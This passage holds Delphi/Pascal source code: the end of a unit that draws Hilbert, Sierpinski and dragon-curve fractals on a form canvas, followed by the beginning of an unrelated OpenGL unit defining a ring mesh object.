div 48);} old_x := x; old_y := y; gen3(i - 1); end; end; begin {GfColor:=4; } if level < 0 then level := 0 else if level > 7 then level := 7; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Font.Color := TempColor; TextOut(10, 10, 'Hilbert 2' + ' Level: ' + IStringer(Level)); Pen.Color := TempColor; Brush.Color := TempColor; MainForm.Show; h := 480; x := 0; y := 0; for i := 1 to level do begin h := h div 2; x := x + h div 2; y := y + h div 2; old_x := x; old_y := y; end; gen1(level); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Font.Color := TempColor; TextOut(10, 10, 'Hilbert 2' + ' Level: ' + IStringer(Level)); Pen.Color := TempColor; Brush.Color := TempColor; Font.Color := TempColor; MainForm.Show; h := 480; x := 0; y := 0; for i := 1 to level do begin h := h div 2; x := x + h div 2; y := y + h div 2; old_x := x; old_y := y; end; gen1(level); {inc(GFColor);} bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Procedure } procedure hil3d(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfcolor, } lc, i: integer; points: array[0..2] of Extended; temp, x1, x2, y1, y2, r, x_angle, y_angle, z_angle, cx, cy, cz, sx, sy, sz: Extended; procedure generate(a: integer; b: integer; c: integer); var sign: array[0..2] of integer; begin sign[0] := 1; sign[1] := 1; sign[2] := 1; dec(level); if a < 0 then sign[0] := -1; a := Abs(a) - 1; if b < 0 then sign[1] := -1; b := Abs(b) - 1; if c < 0 then sign[2] := -1; c := Abs(c) - 1; x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(-2, 1, 3); points[a] := points[a] + (r * sign[0]); x2 := points[0] * cx + points[1] * cy + points[2] * cz; y2 := points[0] * sx + points[1] * sy + points[2] * sz; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(3, 1, -2); points[b] := points[b] + (r * sign[1]); x2 := points[0] * cx + points[1] * cy + points[2] * cz; y2 := points[0] * sx + points[1] * sy + points[2] * sz; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(3, 1, -2); points[a] := points[a] - (r * sign[0]); x2 := points[0] * cx + points[1] * cy + points[2] * cz; y2 := points[0] * sx + points[1] * sy + points[2] * sz; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(2, -3, 1); points[c] := points[c] + (r * sign[2]); x2 := points[0] * cx + points[1] * cy + points[2] * cz; y2 := points[0] * sx + points[1] * sy + points[2] * sz; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(-3, 1, 2); points[a] := points[a] + (r * sign[0]); x2 := points[0] * cx + points[1] * cy + points[2] * cz; y2 := points[0] * sx + points[1] * sy + points[2] * sz; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(-2, 3, 1); points[b] := points[b] - (r * sign[1]); x2 := points[0] * cx + points[1] * cy + points[2] * cz; y2 := points[0] * sx + points[1] * sy + points[2] * sz; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(3, -1, 2); points[a] := points[a] - (r * sign[0]); x2 := points[0] * cx + points[1] * cy + points[2] * cz; y2 := points[0] * sx + points[1] * sy + points[2] * sz; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := points[0] * cx + points[1] * cy + points[2] * cz; y1 := points[0] * sx + points[1] * sy + points[2] * sz; if level > 0 then generate(-2, -1, -3); inc(level); end; begin {gfColor:=4; } x_angle := -55; y_angle := 90; z_angle := 0; if level < 0 then level := 0 else if level > 3 then level := 3; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; {Brush.Color:=TempColor; } Font.Color := TempColor; MainForm.Show; sx := Sin(x_angle * 0.017453292); sy := Sin(y_angle * 0.017453292); sz := Sin(z_angle * 0.017453292); cx := Cos(x_angle * 0.017453292); cy := Cos(y_angle * 0.017453292); cz := Cos(z_angle * 0.017453292); temp := 2; i := level; while i > 1 do begin temp := temp * 2; dec(i); end; r := 300 / temp; points[0] := -200; points[1] := 50; points[2] := 0; generate(3, -2, 1); TextOut(10, 10, 'Hilbert 3D' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 2 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; {Brush.Color:=TempColor;} Font.Color := TempColor; MainForm.Show; sx := Sin(x_angle * 0.017453292); sy := Sin(y_angle * 0.017453292); sz := Sin(z_angle * 0.017453292); cx := Cos(x_angle * 0.017453292); cy := Cos(y_angle * 0.017453292); cz := Cos(z_angle * 0.017453292); temp := 2; i := level; while i > 1 do begin temp := temp * 2; dec(i); end; r := 300 / temp; points[0] := -200; points[1] := 50; points[2] := 0; generate(3, -2, 1); TextOut(10, 10, 'Hilbert 3D' + ' Level: ' + IStringer(Level)); {inc(GFColor);} bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Procedure } procedure sierp(level: integer); { of 8 } var TempColor: TColor; maxcolx, maxrowy, {[gfColor, ]} lc, generator_size: integer; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer; sign: integer); var j, k, int_sign: integer; Xpoints, Ypoints: array[0..24] of Extended; begin turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 2.0; turtle_x := X1; turtle_y := Y1; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[3] := X2; Ypoints[3] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turn(60 * sign); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(-60 * sign); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; dec(level); sign := -sign; if level = 0 then begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end else begin int_sign := sign; for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level, int_sign); int_sign := -int_sign; end; end; end; begin generator_size := 3; {GfColor:=4; } if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; {Brush.Color:=TempColor;} Font.Color := TempColor; TextOut(10, 10, 'Sierpinski' + ' Level: ' + IStringer(Level)); MainForm.Show; generate(-150, -50, 150, -50, level, 1); { -50 was 0, 150 was 130 } end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; {Brush.Color:=TempColor;} Font.Color := TempColor; TextOut(10, 10, 'Sierpinski' + ' Level: ' + IStringer(Level)); MainForm.Show; generate(-150, -50, 150, -50, level, 1); { 50 was 0 } {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Sierp } procedure siergask(level: integer); {fast enough at all 5 levels } var TempColor: TColor; maxcolx, maxrowy, {gfcolor, } lc, L_length, x1, y1, x2, y2, x3, y3: integer; Triangle: array[1..3] of TPoint; procedure node(x1: integer; y1: integer; x2: integer; y2: integer; x3: integer; y3: integer; x4: integer; y4: integer; x5: integer; y5: integer; x6: integer; y6: integer; level: integer; l_length: integer); forward; procedure generate(x1: integer; y1: integer; x2: integer; y2: integer; x3: integer; y3: integer; level: integer; l_length: integer); var line_length, x4, y4, x5, y5, x6, y6: integer; begin line_length := l_length div 2; x4 := x1 + line_length; y4 := y1; x5 := x1 + line_length div 2; {???} y5 := y1 - Round((line_length / 2) * 1.26292); x6 := x5 + line_length; y6 := y5; node(x1, y1, x2, y2, x3, y3, x4, y4, x5, y5, x6, y6, level, line_length); end; procedure node(x1: integer; y1: integer; x2: integer; y2: integer; x3: integer; y3: integer; x4: integer; y4: integer; x5: integer; y5: integer; x6: integer; y6: integer; level: integer; l_length: integer); begin Triangle[1].x := x4; Triangle[1].y := y4; Triangle[2].x := x5; Triangle[2].y := y5; Triangle[3].x := x6; Triangle[3].y := y6; MainForm.Image2.Canvas.Polygon(Triangle); if level <> 0 then begin generate(x1, y1, x4, y4, x5, y5, level - 1, l_length); generate(x4, y4, x2, y2, x6, y6, level - 1, l_length); generate(x5, y5, x6, y6, x3, y3, level - 1, l_length); end; end; begin if level < 0 then level := 0 else if level > 5 then level := 5; {GfColor:=4; } if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Sier Gasket' + ' Level: ' + IStringer(Level)); MainForm.Show; {Brush.Color:=TempColor;} x1 := 64; {64;} y1 := 385; {335} x2 := 576; {576;} y2 := 385; {335} x3 := 320; y3 := 65; {15} l_length := 512; {512;} { SetFillStyle(1,4);} Triangle[1].x := x1; Triangle[1].y := y1; Triangle[2].x := x2; Triangle[2].y := y2; Triangle[3].x := x3; Triangle[3].y := y3; MainForm.Image2.Canvas.Polygon(Triangle); { SetFillStyle(1,3); SetBkColor(1); SetColor(GfColor);} generate(x1, y1, x2, y2, x3, y3, level, l_length); end; end else begin for lc := 1 to 4 do begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; Textout(10, 10, 'Sier Gasket' + ' Level: ' + IStringer(Level)); MainForm.Show; {inc(GFColor); } level := lc; x1 := 64; {64;} y1 := 385; x2 := 576; {576;} y2 := 385; x3 := 320; y3 := 65; l_length := 512; {512;} { SetFillStyle(1,4);} Triangle[1].x := x1; Triangle[1].y := y1; Triangle[2].x := x2; Triangle[2].y := y2; Triangle[3].x := x3; Triangle[3].y := y3; MainForm.Image2.Canvas.Polygon(Triangle); { SetFillStyle(1,3); SetBkColor(1); SetColor(GfColor);} generate(x1, y1, x2, y2, x3, y3, level, l_length); bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Siergask } procedure sierbox(level: integer); { of 3 } {const} var Square: array[1..4] of TPoint; var TempColor: TColor; {maxcolx,maxrowy,gfcolor,} lc, L_length, x1, y1, x2, y2: integer; procedure node(x1: integer; y1: integer; x2: integer; y2: integer; x3: integer; y3: integer; x4: integer; y4: integer; level: integer; l_length: integer); forward; procedure generate(x1: integer; y1: integer; x2: integer; y2: integer; level: integer; l_length: integer); var line_length, x3, y3, x4, y4: integer; begin {35/49=.729...} line_length := l_length div 3; x3 := x1 + line_length; y3 := y1 - (35 * line_length) div 48; x4 := x2 - line_length; y4 := y2 + (35 * line_length) div 48; node(x1, y1, x2, y2, x3, y3, x4, y4, level, line_length); end; procedure node(x1: integer; y1: integer; x2: integer; y2: integer; x3: integer; y3: integer; x4: integer; y4: integer; level: integer; l_length: integer); begin Square[1].x := x3; Square[1].y := y3; Square[2].x := x4; Square[2].y := y3; Square[3].x := x4; Square[3].y := y4; Square[4].x := x3; Square[4].y := y4; MainForm.Image2.Canvas.Polygon(Square); if level <> 0 then begin generate(x1, y1, x3, y3, level - 1, l_length); generate(x3, y1, x4, y3, level - 1, l_length); generate(x4, y1, x2, y3, level - 1, l_length); generate(x1, y3, x3, y4, level - 1, l_length); generate(x4, y3, x2, y4, level - 1, l_length); generate(x1, y4, x3, y2, level - 1, l_length); generate(x3, y4, x4, y2, level - 1, l_length); generate(x4, y4, x2, y2, level - 1, l_length); end; end; begin if level < 0 then level := 0 else if level > 3 then level := 3; {GfColor:=4; } {pcxVGASetup; } if Level > 0 then begin with MainForm.Image2.Canvas do begin { maxcolx :=(FYImageX-1); maxrowy := (FYImageY-1); } Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, FYImageX, FYImageY)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 470, 'Sierpinski Box' + ' Level: ' + IStringer(Level)); Brush.Color := TempColor; MainForm.Show; x1 := 100; {100;} y1 := 335; {335} x2 := 540; {540;} y2 := 15; {15} l_length := 440; {440;} { SetFillStyle(1,15);} Square[1].x := x1; Square[1].y := y1; Square[2].x := x2; Square[2].y := y1; Square[3].x := x2; Square[3].y := y2; Square[4].x := x1; Square[4].y := y2; MainForm.Image2.Canvas.Polygon(Square); { SetFillStyle(1,4); }{1,0} { SetColor(GfColor); SetBkColor(1);} generate(x1, y1, x2, y2, level, l_length); end; end else begin for lc := 1 to 3 do begin with MainForm.Image2.Canvas do begin { maxcolx :=(FYImageX-1); maxrowy := (FYImageY-1);} Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, FYImageX, FYImageY)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 470, 'Sierpinski Box' + ' Level: ' + IStringer(Level)); Brush.Color := TempColor; MainForm.Show; level := lc; x1 := 100; {100;} y1 := 335; {335} x2 := 540; {540;} y2 := 15; {15} l_length := 440; {440;} { SetFillStyle(1,15);} Square[1].x := x1; Square[1].y := y1; Square[2].x := x2; Square[2].y := y1; Square[3].x := x2; Square[3].y := y2; Square[4].x := x1; Square[4].y := y2; MainForm.Image2.Canvas.Polygon(Square); { SetFillStyle(1,12); SetColor(GfColor);} generate(x1, y1, x2, y2, level, l_length); {inc(GFColor);} bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Sier Box } procedure Dragon_Curve(level: integer); var XAxis, YAxis: array[1..4098] of integer; TempColor: TColor; maxcolx, maxrowy, Step, Sign: integer; procedure Generate_Dragon(color: integer); var i, j, dx, dy: integer; begin j := Step div 2; { setcolor( color );]} i := 1; repeat dx := xaxis[Step + i] - xaxis[i]; dy := yaxis[Step + i] - yaxis[i]; Sign := Sign * -1; { omit for Arabesque } xaxis[i + j] := xaxis[i] + (dx + (dy * sign)) div 2; yaxis[i + j] := yaxis[i] + (dy - (dx * sign)) div 2; { if color <> 0 then} begin MainForm.Image2.Canvas.Moveto(xaxis[i], yaxis[i]); MainForm.Image2.Canvas.Lineto(xaxis[i + j], yaxis[i + j]); MainForm.Image2.Canvas.Moveto(xaxis[i + j], yaxis[i + j]); MainForm.Image2.Canvas.Lineto(xaxis[i + Step], yaxis[i + Step]); end; inc(i, Step); until i >= 4096; end; var {Change to getting the Image X Y} { GetMaxX,GetMaxY,} i: integer; begin Step := 4096; sign := -1; maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); xaxis[1] := maxcolx div 4; xaxis[4097] := 3 * maxcolx div 4; {480} { 3 * 160 = 480 } yaxis[1] := 3 * maxrowy div 4; {360} { 2 * 160 = 320 } yaxis[4097] := yaxis[1]; if Level > 0 then begin with MainForm.Image2.Canvas do begin Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(255 - GetRValue(FBackGroundColor), 255 - GetGValue(FBackGroundColor), 255 - GetBValue(FBackGroundColor)); Pen.Color := TempColor; Font.Color := TempColor; TextOut(1, 10, 'Fractal Dragon Curve' + ' Level: ' + IStringer(Level)); MainForm.Show; Moveto(xaxis[1], yaxis[1]); Lineto(xaxis[4097], yaxis[4097]); Generate_Dragon(Level); end; end else begin with MainForm.Image2.Canvas do begin Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(255 - GetRValue(FBackGroundColor), 255 - GetGValue(FBackGroundColor), 255 - GetBValue(FBackGroundColor)); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; Moveto(xaxis[1], yaxis[1]); Lineto(xaxis[4097], yaxis[4097]); for i := 3 to 14 do begin Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(255 - GetRValue(FBackGroundColor), 255 - GetGValue(FBackGroundColor), 255 - GetBValue(FBackGroundColor)); Pen.Color := TempColor; Font.Color := TempColor; Level := i; TextOut(1, 10, 'Fractal Dragon Curve' + ' Level: ' + IStringer(Level)); Generate_Dragon(i); Step := Step div 2; bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of procedure Dragon_Curve } procedure twindrag(level: integer); {231.18 seconds} var TempColor: TColor; maxcolx, maxrowy, DOIT, I, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; sign: Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer; sign: Extended); var j, k: integer; sign2: Extended; Xpoints, Ypoints: array[0..24] of Extended; begin sign2 := -1; turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 1.41421; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[2] := X2; Ypoints[2] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; turn(sign * 45); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; dec(level); if level > 0 then begin for j := 0 to generator_size - 2 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level, sign2); sign2 := -sign2; end; end else begin for k := 0 to generator_size - 2 do begin {y[]*0.729} MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin initiator_x1[0] := -150; initiator_x1[1] := 150; initiator_x2[0] := 150; initiator_x2[1] := -150; sign := 1; generator_size := 3; init_size := 2; initiator_y1[0] := -25; initiator_y1[1] := -25; initiator_y2[0] := -25; initiator_y2[1] := -25; { level := 6; REWRITE for LEVELS see others for loop} if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(255 - GetRValue(Level * 4), 255 - GetGValue(Level * 4), 255 - GetBValue(Level * 4)); Pen.Color := TempColor; Font.Color := TempColor; TextOut(320, 10, 'Twin Dragon' + ' Level: ' + IStringer(Level)); MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, sign); TempColor := RGB(155 - GetRValue(Level * 4), 155 - GetGValue(Level * 4), 155 - GetBValue(Level * 4)); Pen.Color := TempColor; end; end; end else for DOIT := 1 to 6 do begin Level := Doit; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(255 - GetRValue(Level * 4), 255 - GetGValue(Level * 4), 255 - GetBValue(Level * 4)); Pen.Color := TempColor; Font.Color := TempColor; TextOut(320, 10, 'Twin Dragon' + ' Level: ' + IStringer(Level)); MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, sign); TempColor := RGB(155 - GetRValue(Level * 4), 155 - GetGValue(Level * 4), 155 - GetBValue(Level * 4)); Pen.Color := TempColor; end; bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; { TWINDRAG } end.
unit GLDRing; interface uses Classes, GL, GLDTypes, GLDConst, GLDClasses, GLDObjects; type TGLDRing = class(TGLDEditableObject) private FInnerRadius: GLfloat; FOuterRadius: GLfloat; FSegments: GLushort; FSides: GLushort; FStartAngle: GLfloat; FSweepAngle: GLfloat; FPoints: PGLDVector3fArray; FNormals: PGLDVector3fArray; {$HINTS OFF} function GetMode: GLubyte; function GetPoint(i, j: GLushort): PGLDVector3f; function GetNormal(i, j: GLushort): PGLDVector3f; {$HINTS ON} procedure SetInnerRadius(Value: GLfloat); procedure SetOuterRadius(Value: GLfloat); procedure SetSegments(Value: GLushort); procedure SetSides(Value: GLushort); procedure SetStartAngle(Value: GLfloat); procedure SetSweepAngle(Value: GLfloat); function GetParams: TGLDRingParams; procedure SetParams(Value: TGLDRingParams); protected procedure CalcBoundingBox; override; procedure CreateGeometry; override; procedure DestroyGeometry; override; procedure DoRender; override; procedure SimpleRender; override; public constructor Create(AOwner: TPersistent); override; destructor Destroy; override; procedure Assign(Source: TPersistent); override; class function SysClassType: TGLDSysClassType; override; class function VisualObjectClassType: TGLDVisualObjectClass; override; class function RealName: string; override; procedure LoadFromStream(Stream: TStream); override; procedure SaveToStream(Stream: TStream); override; function CanConvertTo(_ClassType: TClass): GLboolean; override; function ConvertTo(Dest: TPersistent): GLboolean; override; function ConvertToTriMesh(Dest: TPersistent): GLboolean; function ConvertToQuadMesh(Dest: TPersistent): GLboolean; function ConvertToPolyMesh(Dest: TPersistent): GLboolean; property Params: TGLDRingParams read GetParams write SetParams; published property InnerRadius: GLfloat read FInnerRadius write SetInnerRadius; property OuterRadius: GLfloat read FOuterRadius write SetOuterRadius; property Segments: GLushort read FSegments write SetSegments default GLD_RING_SEGMENTS_DEFAULT; property Sides: GLushort read FSides write SetSides default GLD_RING_SIDES_DEFAULT; property StartAngle: GLfloat read FStartAngle write SetStartAngle; property SweepAngle: GLfloat read FSweepAngle write SetSweepAngle; end; implementation uses SysUtils, GLDGizmos, GLDX, GLDMesh, GLDUtils; var vRingCounter: GLuint = 0; constructor TGLDRing.Create(AOwner: TPersistent); begin inherited Create(AOwner); Inc(vRingCounter); FName := GLD_RING_STR + IntToStr(vRingCounter); FInnerRadius := GLD_STD_RINGPARAMS.InnerRadius; FOuterRadius := GLD_STD_RINGPARAMS.OuterRadius; FSegments := GLD_STD_RINGPARAMS.Segments; FSides := GLD_STD_RINGPARAMS.Sides; FStartAngle := GLD_STD_RINGPARAMS.StartAngle; FSweepAngle := GLD_STD_RINGPARAMS.SweepAngle; FPosition.Vector3f := GLD_STD_RINGPARAMS.Position; FRotation.Params := GLD_STD_RINGPARAMS.Rotation; CreateGeometry; end; destructor TGLDRing.Destroy; begin inherited Destroy; end; procedure TGLDRing.Assign(Source: TPersistent); begin if (Source = nil) or (Source = Self) then Exit; if not (Source is TGLDRing) then Exit; inherited Assign(Source); SetParams(TGLDRing(Source).GetParams); end; procedure TGLDRing.DoRender; var iSegs, iP: GLushort; begin for iSegs := 0 to FSegments - 1 do begin glBegin(GL_QUAD_STRIP); for iP := 2 to FSides + 2 do begin glNormal3fv(@FNormals^[iSegs * (FSides + 3) + iP]); glVertex3fv(@FPoints^[iSegs * (FSides + 3) + iP]); glNormal3fv(@FNormals^[(iSegs + 1) * (FSides + 3) + iP]); glVertex3fv(@FPoints^[(iSegs + 1) * (FSides + 3) + iP]); end; glEnd; end; end; procedure TGLDRing.SimpleRender; var iSegs, iP: GLushort; begin for iSegs := 0 to FSegments - 1 do begin glBegin(GL_QUAD_STRIP); for iP := 2 to FSides + 2 do begin glVertex3fv(@FPoints^[iSegs * (FSides + 3) + iP]); glVertex3fv(@FPoints^[(iSegs + 1) * (FSides + 3) + iP]); end; glEnd; end; end; procedure TGLDRing.CalcBoundingBox; begin FBoundingBox := GLDXCalcBoundingBox(FPoints, (FSegments + 1) * (FSides + 1)); end; procedure TGLDRing.CreateGeometry; var iSegs, iP: GLushort; A, R: GLfloat; begin if FSegments > 1000 then FSegments := 1000 else if FSegments < 1 then FSegments := 1; if FSides > 1000 then FSides := 1000 else if FSides < 1 then FSides := 1; ReallocMem(FPoints, (FSegments + 1) * (FSides + 3) * SizeOf(TGLDVector3f)); ReallocMem(FNormals, (FSegments + 1) * (FSides + 3) * SizeOf(TGLDVector3f)); A := GLDXGetAngleStep(FStartAngle, FSweepAngle, FSides); R := (FOuterRadius - FInnerRadius) / FSegments; for iSegs := 0 to FSegments do for iP := 1 to FSides + 3 do begin FPoints^[iSegs * (FSides + 3) + iP] := GLDXVector3f( GLDXCoSinus(FStartAngle + (iP - 2) * A) * (FInnerRadius + (iSegs * R)), 0, -GLDXSinus(FStartAngle + (iP - 2) * A) * (FInnerRadius + (iSegs * R))); end; FModifyList.ModifyPoints( [GLDXVector3fArrayData(FPoints, (FSides + 3) * (FSegments + 1))]); GLDXCalcQuadPatchNormals(GLDXQuadPatchData3f( GLDXVector3fArrayData(FPoints, (FSegments + 1) * (FSides + 3)), GLDXVector3fArrayData(FNormals, (FSegments + 1) * (FSides + 3)), FSegments, FSides + 2)); CalcBoundingBox; end; procedure TGLDRing.DestroyGeometry; begin if FPoints <> nil then ReallocMem(FPoints, 0); FPoints := nil; if FNormals <> nil then ReallocMem(FNormals, 0); FNormals := nil; end; class function TGLDRing.SysClassType: TGLDSysClassType; begin Result := GLD_SYSCLASS_RING; end; class function TGLDRing.VisualObjectClassType: TGLDVisualObjectClass; begin Result := TGLDRing; end; class function TGLDRing.RealName: string; begin Result := GLD_RING_STR; end; procedure TGLDRing.LoadFromStream(Stream: TStream); begin inherited LoadFromStream(Stream); Stream.Read(FInnerRadius, SizeOf(GLfloat)); Stream.Read(FOuterRadius, SizeOf(GLfloat)); Stream.Read(FSegments, SizeOf(GLushort)); Stream.Read(FSides, SizeOf(GLushort)); Stream.Read(FStartAngle, SizeOf(GLfloat)); Stream.Read(FSweepAngle, SizeOf(GLfloat)); CreateGeometry; end; procedure TGLDRing.SaveToStream(Stream: TStream); begin inherited SaveToStream(Stream); Stream.Write(FInnerRadius, SizeOf(GLfloat)); Stream.Write(FOuterRadius, SizeOf(GLfloat)); Stream.Write(FSegments, SizeOf(GLushort)); Stream.Write(FSides, SizeOf(GLushort)); Stream.Write(FStartAngle, SizeOf(GLfloat)); Stream.Write(FSweepAngle, SizeOf(GLfloat)); end; function TGLDRing.CanConvertTo(_ClassType: TClass): GLboolean; begin Result := (_ClassType = TGLDRing) or (_ClassType = TGLDTriMesh) or 